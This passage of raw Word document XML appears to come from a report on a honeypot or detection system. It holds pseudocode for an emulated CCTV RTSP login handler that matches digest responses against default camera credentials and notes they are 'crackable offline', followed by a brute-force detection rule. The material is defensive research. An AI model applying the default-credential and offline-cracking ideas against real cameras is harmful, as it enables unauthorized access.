                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">else if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> scheme = digest </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10:         pass ← digest_check(params, method);  ok ← pass ≠ None</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11:     session.auth(user, pass </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> "&lt;digest&gt;", ok, digest fields)   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// crackable offline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ok </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 401</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 200 with SDP(H264/90000 video, PCMA audio)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> digest_check(params, method):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (u, p) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> DEFAULTS["cctv"] with u = params.username </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">16:         ha1 ← MD5(u : realm : p);  ha2 ← MD5(method : uri)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">17:         expected ← MD5(ha1 : nonce : [nc : cnonce : qop :] ha2)     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// RFC 2617</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">18:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> expected = params.response </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> p</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">20:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9023" w:name="_Toc69023"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A6 – Detection Pass and De-duplicated Storage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9023"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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5142"/>
        <w:gridCol w:w="4208"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="28829D87" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A6 engine.run_once (every 30 s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A6.1 brute_force rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="1986AEDF" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> unified events table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> auth events of the last BF_WINDOW_MIN (10) minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="077446CA" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> new detections with MITRE IDs; correlation and alerts updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> BRUTE_FORCE detections with severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="678C4C23" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> run_once():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      dets ← []</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> rule </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ALL_RULES </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> dets += rule()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
